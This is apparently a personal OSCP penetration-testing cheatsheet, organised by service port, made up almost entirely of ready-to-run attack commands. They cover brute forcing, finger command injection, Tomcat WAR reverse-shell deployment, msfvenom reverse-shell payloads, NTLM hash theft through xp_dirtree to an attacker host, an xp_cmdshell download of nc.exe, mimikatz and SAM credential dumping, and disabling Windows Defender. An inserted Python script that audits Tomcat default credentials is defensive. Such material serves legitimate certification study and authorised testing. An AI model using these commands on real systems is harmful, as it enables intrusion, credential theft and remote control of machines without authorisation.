sysadmon/offensive-security-practices-cheatsheet
OSCP personal cheatsheet

Enumeration

nmap -sn -v <IP>/CIDR
nmapAutomator <IP> All
autorecon <IP>/CIDR

NMAP

TCP

sudo nmap -sS -sC -sV -oA <NAME>.tcp -v <IP>

UDP

sudo nmap -sU -sS -sC -sV -oA <NAME>.udp -v <IP>

FTP - 21

Brute force

hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp://<IP> -u -vV

Downloading file

ftp {IP}

PASSIVE

BINARY

get {FILE}

Uploading file

ftp {IP}

PASSIVE

BINARY

put {FILE}

SSH - 22

Brute force

hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh://<IP> -u -vV

DNS - 53

dnsenum <DOMAIN>
dnsrecon -d <DOMAIN>

Zone transfer

dnsrecon -d <DOMAIN> -a
dig axfr <DOMAIN> @ns1.test.com

DNS brute force

FINGER - 79

User enumeration

finger @<IP>
finger <USER>@<IP>

Command execution

finger "|/bin/id@<IP>"
finger "|/bin/ls -a /@<IP>"

HTTP - HTTPS - 80 - 443

Automatic scanners

nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20

Wordpress

Scan

wpscan --rua -e --url <URL>

Brute force user(s)

wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER1>,<USER2>"

Tomcat

Default credentials

The most interesting Tomcat path is /manager/html: from there you can upload and deploy WAR files, which means code execution. The path is protected by HTTP basic auth, and the most common credentials are:

admin:admin
tomcat:tomcat
admin: (blank password)
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
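A defender-side check for this, added here and not part of the cheatsheet: it audits a tomcat-users.xml (the sample below is constructed) for the default pairs listed above and for manager-role accounts with short passwords (the 12-character threshold is an assumption).

```python
"""Audit a Tomcat tomcat-users.xml for the default manager credentials listed above.
Added example, not part of the cheatsheet; the sample XML is constructed."""
import xml.etree.ElementTree as ET

# Default username:password pairs from the cheatsheet; "" means a blank password.
DEFAULT_CREDS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}
# Roles that grant access to /manager/html or the text (script) interface.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}
MIN_LEN = 12  # assumed minimum password length for manager accounts

# Constructed sample tomcat-users.xml for demonstration.
SAMPLE_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui"/>
  <user username="admin" password="" roles="manager-script"/>
  <user username="deploy" password="Xk9!v2Lq#p8Rz" roles="manager-script"/>
</tomcat-users>
"""

def audit_tomcat_users(xml_text):
    """Return a list of (username, reason) findings for weak manager accounts."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        # Elements are namespaced; match on the local tag name only.
        if el.tag.split("}")[-1] != "user":
            continue
        user = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (user, pw) in DEFAULT_CREDS:
            findings.append((user, "default credential pair"))
        elif roles & MANAGER_ROLES and len(pw) < MIN_LEN:
            findings.append((user, "manager role with short password"))
    return findings

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_XML):
        print(f"WEAK: {user}: {reason}")
```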

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u

Tomcat panel RCE

Generate payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

Upload payload

Tomcat6:

wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -

Tomcat7 and above:

curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shell&update=true'

Listener

nc -lvp <PORT>

Execute payload

curl http://<IP>:8080/shell/

POP3 - 110

Brute force

hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V
hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V

Read mail

telnet <IP> 110

USER <USER>
PASS <PASSWORD>
LIST
RETR <MAIL_NUMBER>
QUIT

SNMP - 161

Brute force community string

onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt <IP>
snmpbulkwalk -c <COMMUNITY_STRING> -v <VERSION> <IP>
snmp-check <IP>

LDAP - 389

Scans

nmap -n -sV --script "ldap* and not brute" <IP>

ldapsearch -h <IP> -x -s base
ldapsearch -h <IP> -x -D '<USER>' -w '<PASSWORD>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

SMB - 445

Version if nmap didn't detect it

sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP>

Scan for vulnerability

nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>

If vulnerable:

  • MS17-010 - EternalBlue
  • MS08-067 - MS08-067
  • CVE-2017-7494 - CVE-2017-7494

Manual testing

smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '<USER>' -p '<PASSWORD>' -H <IP> -R

crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '<USER>' -p '<PASSWORD>' --shares

enum4linux -a <IP>

smbclient --no-pass -L //<IP>
smbclient //<IP>/<SHARE>

Download all files from a directory recursively

smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"

Brute force

crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV

Mount an SMB share

mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>' //<IP>/<SHARE> /tmp/share

smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>

Get a shell

psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes <LM_HASH>:<NT_HASH>

wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes <LM_HASH>:<NT_HASH>

smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes <LM_HASH>:<NT_HASH>

atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
atexec.py <DOMAIN>/<USER>@<IP> -hashes <LM_HASH>:<NT_HASH>

Check if vulnerable

python eternal_checker.py <IP>

MSSQL - 1433

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u

Having credentials

mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

Once logged in you can run queries:

SQL> select @@version;

Steal NTLM hash

sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<ATTACKER_IP>\liodeus'
# The SMB server captures the NTLM hash; crack it with john or hashcat

Try to enable code execution

SQL> enable_xp_cmdshell

Execute code

SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe

NFS - 2049

Show Mountable NFS Shares

showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>

Mount a share

sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>

MYSQL - 3306

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u

Extracting MySQL credentials from files

cat /etc/mysql/debian.cnf
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Connect

Local

mysql -u <USER>
mysql -u <USER> -p

Remote

mysql -h <IP> -u <USER>

RDP - 3389

Brute force

crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>

hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV

Connect with known credentials / hash

rdesktop -u <USER> <IP>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORD> <IP>

xfreerdp /u:[DOMAIN\]<USER> /p:<PASSWORD> /v:<IP>
xfreerdp /u:[DOMAIN\]<USER> /pth:<NTLM_HASH> /v:<IP>

Session stealing

Get opened sessions

query user

Access the selected session

tscon <SESSION_ID> /dest:<SESSION_NAME>

Adding user to RDP group (Windows)

net localgroup "Remote Desktop Users" <USER> /add

WINRM - 5985 - 5986

Brute force

crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>

Connecting

evil-winrm -i <IP> -u <USER> -p <PASSWORD>
evil-winrm -i <IP> -u <USER> -H <NTLM_HASH>

HASHES

Windows

reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System

samdump2 System SAM > hashes

Linux

unshadow passwd shadow > hashes

MIMIKATZ

privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export

kerberos::list /export

vault::cred
vault::list

lsadump::sam
lsadump::secrets
lsadump::cache

MSFVENOM PAYLOAD

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Python

msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl

Listener

Metasploit

use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <IP>
set LPORT <PORT>
set ExitOnSession false
exploit -j -z

Netcat

nc -lvp <PORT>

PASSWORD CRACKING

Online

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes

Hashcat

Linux password

hashcat -m 1800 -a 0 hash.txt rockyou.txt
hashcat -m 1800 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Windows password

hashcat -m 1000 -a 0 hash.txt rockyou.txt
hashcat -m 1000 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Others

hashcat --example-hashes | grep -i '<BEGINNING_OF_HASH>'

Rules

John

john --wordlist=<PASSWORDS_LIST> hash.txt

PIVOTING

Sshuttle

sshuttle <USER>@<IP> <IP_OF_THE_INTERFACE>/CIDR

Proxychains

ssh -f -N -D 9050 <USER>@<IP>
proxychains <COMMAND>

Interesting link

USEFUL WINDOWS COMMANDS

net config Workstation
systeminfo
net users

ipconfig /all
netstat -ano

schtasks /query /fo LIST /v
tasklist /SVC
net start

DRIVERQUERY

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s pass == cred == vnc == .config
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Disable Windows Defender

sc stop WinDefend

Bypass restriction

powershell -nop -ep bypass

List hidden files

dir /a

Find a file

dir /b/s "<FILENAME>"

ZIP

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' file.zip

zip2john file.zip > zip.john
john --wordlist=<PASSWORDS_LIST> zip.john
